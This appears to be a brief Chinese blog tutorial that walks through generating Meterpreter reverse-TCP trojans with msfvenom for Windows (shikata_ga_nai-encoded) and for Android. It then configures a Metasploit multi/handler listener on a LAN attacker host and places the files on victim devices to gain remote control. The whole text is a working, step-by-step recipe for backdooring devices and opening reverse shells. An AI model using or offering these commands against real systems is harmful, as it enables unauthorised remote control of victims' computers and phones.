一、在kali中生成被控制端程序
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.88.188 LPORT=5901 -f exe > test.exe #生成Windows端
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.88.188 LPORT=5555 R > /root/apk.apk #生成安卓端
将生成的文件放置在Windows或安卓手机上。
二、在kali中启动主控制端

输入 msfconsole命令
在Metasploit中使用handler作为主动端,启动命令如下。
use exploit/multi/handler
设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)
set payload windows/meterpreter/reverse_tcp
设置LHOST和LPORT
set lhost 192.168.88.188
set lport 5901
执行 exploit 开启监听
exploit
Windows端执行 test.exe

远程连接成功。安卓也是同样的方式。
本文介绍如何在Kali Linux中使用msfvenom生成针对Windows和Android平台的Meterpreter反向TCP木马,并在Metasploit中启动监听器进行远程控制。通过具体步骤展示从生成木马到远程连接成功的全过程。
1095

被折叠的 条评论
为什么被折叠?



